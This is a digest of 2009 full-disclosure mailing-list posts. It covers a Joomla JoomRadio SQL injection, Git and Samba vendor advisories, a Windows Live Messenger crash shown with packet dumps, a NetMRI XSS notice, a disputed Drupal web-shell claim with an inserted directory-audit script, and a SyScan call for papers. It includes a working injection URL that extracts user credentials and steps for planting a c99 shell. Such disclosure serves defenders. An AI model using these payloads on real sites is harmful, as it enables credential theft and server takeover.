Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection

2009-02-18 Thread Packet Storm
Already discovered in June, 2008.

http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt
bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0
suffers from a remote SQL injection vulnerability. Authored By His0k4 (His0k4.hlm[at]gmail.com)

On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote:
> ###
> # Advisory X
> # Title: Joomla Component com_joomradio SQL Injection
> # Author: 0o_zeus_o0 ( Arturo Z. )
> # Contact: arturo_zamor...@hotmail.com
> # Website: www.securitybroken.com
> # Date: 18/02/09
> # Risk: Medium
> # Vendor Url: http://ajaxportal.eu/
> # Affected Software: JoomRadio
> # autor script:author XrByte , Grusha 
> ##
> #
> #Example:
> ##
> #htp://
> victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION
> SELECT
> user(),concat(username,0x3a,password),user(),user(),user(),user(),user()
> FROM jos_users--
> #
> ##
> #greetz:
> #
> # original advisory: http://www.securitybroken.com
> ##



[USN-723-1] Git vulnerabilities

2009-02-18 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-723-1  February 18, 2009
git-core vulnerabilities
CVE-2008-3546, CVE-2008-5516, CVE-2008-5517, CVE-2008-5916
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  git-core                        1.1.3-1ubuntu1.1

Ubuntu 7.10:
  git-core                        1:1.5.2.5-2ubuntu0.1
  gitweb                          1:1.5.2.5-2ubuntu0.1

Ubuntu 8.04 LTS:
  git-core                        1:1.5.4.3-1ubuntu2.1
  gitweb                          1:1.5.4.3-1ubuntu2.1

Ubuntu 8.10:
  git-core                        1:1.5.6.3-1.1ubuntu2.1
  gitweb                          1:1.5.6.3-1.1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

It was discovered that Git did not properly handle long file paths. If a user
were tricked into performing commands on a specially crafted Git repository, an
attacker could possibly execute arbitrary code with the privileges of the user
invoking the program. (CVE-2008-3546)

It was discovered that the Git web interface (gitweb) did not correctly handle
shell metacharacters when processing certain commands. A remote attacker could
send specially crafted commands to the Git server and execute arbitrary code
with the privileges of the Git web server. This issue only applied to Ubuntu
7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517)

It was discovered that the Git web interface (gitweb) did not properly restrict
the diff.external configuration parameter. A local attacker could exploit this
issue and execute arbitrary code with the privileges of the Git web server.
This issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916)


Updated packages for Ubuntu 6.06 LTS:


Updated packages for Ubuntu 7.10:


[ MDVSA-2009:042 ] samba

2009-02-18 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2009:042
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: February 18, 2009
 Affected: 2009.0
 ___

 Problem Description:

 Samba 3.2.0 through 3.2.6, when registry shares are enabled, allows
 remote authenticated users to access the root filesystem via a crafted
 connection request that specifies a blank share name (CVE-2009-0022).
 
 This update provides samba 3.2.7 to address this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022
 ___

 Updated Packages:


RE: hello bug in windows live messenger

2009-02-18 Thread rasod korad

Author :Microsoft 
Affected Software :   Windows Live Messenger Version 2009 (build 14.0.8064.XXX)
Discovered by : Mr Ha1 : Morad Quraan
Date : 16/2/2009
Greets to : Toto , Xprincezuman , Ahmad Mars , Aousq , Navelove ;)
MSN : webmas...@arabicsecurity.com
 --- - - --- --- -- --


I found a remote denial of service that leads WLM to crash when you
change the charset of the message you send to something not found.

{These packets are sent from your PC when you try to send an instant message via MSN}

Example :
1  192.168.1.100:2038  64.4.34.31:1863  11  Send
      58 46 52 20 32 32 20 53 42 0D 0A                 XFR 22 SB..

2  192.168.1.100:2229  64.4.37.43:1863  104  Send
      55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72  USR 79 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E  @arabicsecurity.
0020  63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45  com;{252BF068-8E
0030  46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34  F5-4031-865B-6E4
0040  44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33  D1B578C9A} 46233
0050  39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 34  9538.21021539.24
0060  32 31 38 33 36 37 0D 0A                          218367..

3  192.168.1.100:2229  64.4.37.43:1863  37  Send
      43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72  CAL 76 webmaster
0010  40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E  @arabicsecurity.
0020  63 6F 6D 0D 0A                                   com..

4  192.168.1.100:2229  64.4.37.43:1863  33  Send
      43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5F  CAL 77 hack_any_
0010  6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0D  o...@hotmail.com.
0020  0A                                               .

5  192.168.1.100:2229  64.4.37.43:1863  146  Send
      4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49  MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D  ME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74  .Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73  ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D  et=UTF-8..X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72  IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65  abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B  nt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A   CS=b2; PF=2
0090  68 69                                            hi

If we change the last packet, number 5, to:

5  192.168.1.100:2229  64.4.37.43:1863  146  Send
      4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49  MSG 78 N 132..MI
0010  4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0D  ME-Version: 1.0.
0020  0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74  .Content-Type: t
0030  65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73  ext/plain; chars
0040  65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2D  et=UTF-8.0.X-MMS-
0050  49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72  IM-Format: FN=Ar
0060  61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65  abic%20Transpare
0070  6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3B  nt; EF=B; CO=ff;
0080  20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A   CS=b2; PF=2
0090  68 69                                            hi


and resend the instant message to the target, WLM will crash with this error:

AppName: msnmsgr.exe AppVer: 14.0.8064.206   ModName: msvcr80.dll
ModVer: 8.0.50727.1433   Offset: faa3

PoC code has been made, and it's not open source because it's a patched version of
Messenger; if you want it, tell me how to give it to you.


  


DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability

2009-02-18 Thread ddvulnalert
Title
-
DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability

Severity

Low

Date Discovered
---
January 19th 2009

Discovered By
-
Digital Defense, Inc. Vulnerability Research Team
Credit: David Marshall and r...@b13$

Vulnerability Description
-
NetMRI contains a cross-site scripting (XSS) issue whereby portions of the GET 
request are echoed back in an error page. This allows scripting tags to be 
executed by the browser to perform XSS attacks. Such an attack would require 
convincing a user to click on a specially crafted link.

Solution Description

On February 18, 2009, Netcordia released a patch named "CrossScriptPatch.gpg" 
to address this vulnerability in all currently supported versions of NetMRI 
through v3.0.1.  Customers can acquire the patch through the normal mechanisms 
or contact Netcordia Technical Support (supp...@netcordia.com) for assistance.  
Additionally, the necessary changes will be incorporated in future versions 
beginning with NetMRI v3.0.2.

Tested Systems / Software (with versions)
--
Red Hat Linux, NetMRI

Vendor Contact
--
Name: Netcordia
Website: http://www.netcordia.com/products/netmri-event-analysis.asp
Contact Information: http://www.netcordia.com/contact/index.asp


Re: LFI in Drupal CMS

2009-02-18 Thread security
Rasool Nasr replied privately with additional details:

- quote

"You must go to the profile folder and create a file with .profile
extension. Then you must copy your shell (such as c99) into created file
for example create shell .profile and then use it with this sample:

http://[sitename]/drupal/install.php?profile=shell"

- unquote

Response:

Installation profiles define which modules should be enabled, and can
customize the installation after they have been installed. This
allows customized "distributions" that enable and configure a set of
modules that work together for a specific kind of site (Drupal for
bloggers, Drupal for musicians, Drupal for developers, and so on).

Just like other Drupal directories, the profiles directory is normally
not writable by the webserver.

The reported "vulnerability" is therefore in the same league as "ZOMG
- IF YOU OVERWRITE INDEX.PHP, TEH CODE IS EXECUTED"

Regards

Heine Deelstra

--
Drupal security team
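
The response above rests on the profiles directory not being writable by the web server. A defender-side check of that condition, as an added example that is not part of the original thread or of Drupal itself: the function name, the allowlist argument, and the definition of "writable" used here (world-writable, or owned by the web server account) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit the profiles/ directory of a Drupal tree.
# Usage (path, account and profile names are assumptions for illustration):
#   audit_profiles /var/www/drupal www-data "default"
# Prints one finding per line. Returns 0 if clean, 1 on findings, 2 on error.
# Limitation: group-writable paths are not evaluated.
audit_profiles() {
    root=$1; web_user=$2; allowed=$3
    dir="$root/profiles"
    [ -d "$dir" ] || { echo "ERROR: no profiles directory under $root"; return 2; }

    # Paths the web server account could modify: world-writable, or owned
    # by that account. Symlinks are skipped (their mode bits are meaningless).
    writable=$(find "$dir" ! -type l \( -perm -0002 -o -user "$web_user" \) -print) || {
        echo "ERROR: find failed (unknown user $web_user?)"; return 2; }

    # *.profile files whose base name is not on the allowlist of
    # profiles the administrator expects to be installed.
    unexpected=$(find "$dir" -type f -name '*.profile' -print |
        while IFS= read -r f; do
            name=$(basename "$f" .profile)
            case " $allowed " in
                *" $name "*) ;;
                *) printf '%s\n' "$f" ;;
            esac
        done)

    rc=0
    if [ -n "$writable" ]; then
        printf '%s\n' "$writable" | sed 's/^/WRITABLE /'; rc=1
    fi
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected" | sed 's/^/UNEXPECTED /'; rc=1
    fi
    return $rc
}

# Run directly when called with: DRUPAL_ROOT WEB_USER "ALLOWED PROFILE NAMES"
if [ "$#" -ge 3 ]; then audit_profiles "$@"; fi
```

A WRITABLE finding means the precondition described in the response does not hold on that host; an UNEXPECTED finding is a profile file nobody on the allowlist accounts for.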


Re: SyScan'09 Call For Paper - Shanghai, Hong Kong, Singapore, Taipei

2009-02-18 Thread organi...@syscan.org
dear all

CFP for SyScan'09 Shanghai and Hong Kong will be closing in 10 days'
time. the closing date is 28th February 2009.

If you do not want to miss out on a sensational party on a chinese junk
sailing around Hong Kong's many islands and/or visiting the famous
Shanghai Bund and tasting the most delicious "little dragon dumplings",
send in your submission now.


SyScan'09 CALL FOR PAPERS/TRAINING

ABOUT SYSCAN'09
This year, SyScan'09 will be held in the 4 exciting cities of Singapore,
Shanghai, Taipei and Hong Kong. Details are as follows:

SyScan'09 Shanghai
date: 13, 14 May 2009
venue: Ramada Plaza Hotel Shanghai

SyScan'09 Hong Kong
date: 19, 20 May 2009
venue: Langham Place Hotel

SyScan'09 Singapore
date: 2, 3 July 2009
venue: Novotel Clarke Quay Hotel

SyScan'09 Taipei
date: 7, 8 July 2009
venue: NTUH International Convention Center

CFP COMMITTEE
The Call for Papers committee for SyScan’09 comprises the following
personnel:

1. Thomas Lim – Organiser of SyScan and CEO of COSEINC
2. Dave Aitel – Founder and CTO of Immunitysec
3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye
4. Matthew “Shok” Conover – Symantec

The CFP committee will review all submissions and determine the final
list of speakers for SyScan’09.

CONFERENCE TOPICS
The focus for SyScan’09 will include the following:

*Operating Systems *
• Vista
• Windows 7
• Linux
*Mobile Devices/Embedded systems *
• SmartPhones
• PDAs
• Game Consoles
*Web 2.0 *
• Web services
• PHP
• .Net/.asp
• Web applications
*Networking/Telecommunication *
• VoIP
• 3G/3.5G network
• IPv6
• WLAN/WiFi
• GPRS
*New Technologies*
• Chrome
• IE8
• Android
• iPhone
*Virtualization *
*Malware/Rootkits
BotNets
Security Policy/Best Practices
Legislation*
Any topics that will catch the attention of the CFP committee and/or the
world.

TRAINING TOPICS
SyScan’09 training topics will focus on the following areas:

Web Applications
Networks
Securing Windows/Linux Systems
Databases
Storage
Secure Programming/Development

PRIVILEGES
Speakers’ Privileges:
• Return economy class air-ticket for one person.
• 3 nights of accommodation.
• Breakfast, lunch and dinner during conference.
• After-conference party.
• A very healthy dose of alcohol and fun.
• S$500 cash for speakers with brand new presentations.

Trainers’ Privileges:
• 50% of net profit of class.
• 2 nights of accommodation (conference) (applicable for Singapore only).
• After-conference party.
• A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the
difference between the total fee collected for each class and the total
expenses incurred for each class. The expenses of each class would
include the return economy air-ticket of the trainer, 3 nights of
accommodation (training) and the rental of the training venue.


*CFP SUBMISSION*
CFP submission must include the following information:

1) Brief biography including list of publications and papers published
previously or training classes conducted previously.
2) Proposed presentation/training title, category, synopsis and
description.
3) Contact Information (full name, alias, handler, e-mail, postal
address, phone, fax, photo, country of origin, special dietary
requirement).
4) Employment and/or affiliations information.
5) Any significant presentation and educational/training
experience/background.
6) Why is your material different or innovative or significant or an
important tutorial?

Please note that all speakers will be allocated 50 minutes of
presentation time. Any speakers that require more time must inform the
CFP committee during the CFP submission.

Training classes will be 2 full days. Please inform the CFP committee if
your class is shorter or longer than 2 days during your CFP submission.

All submissions must be in English and in PDF format only. The more
information you provide, the better the chance for selection. Please
send submission to c...@syscan.org.


*IMPORTANT DATES *
*Shanghai*
Final CFP Submission – 28th February 2009.
Notification of Acceptance – 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) – 15th
April 2009

*Hong Kong*
Final CFP Submission – 28th February 2009.
Notification of Acceptance – 16th March 2009.
Final Submission for Accepted Presentation Material (Speakers) – 15th
April 2009.

*Singapore*
Final CFP Submission – 31st March 2009.
Notification of Acceptance – 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) – 8th May
2009.

*Taipei*
Final CFP Submission – 31st March 2009.
Notification of Acceptance – 15th April 2009.
Final Submission for Accepted Presentation Material (Speakers) – 8th May
2009.


*OTHER INFORMATION *
Please feel free to visit the SyScan website to get a feel for what this
conference is all about – SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd.
the rights to reproduce, distribute, advertise and show your
presentation including but not limited to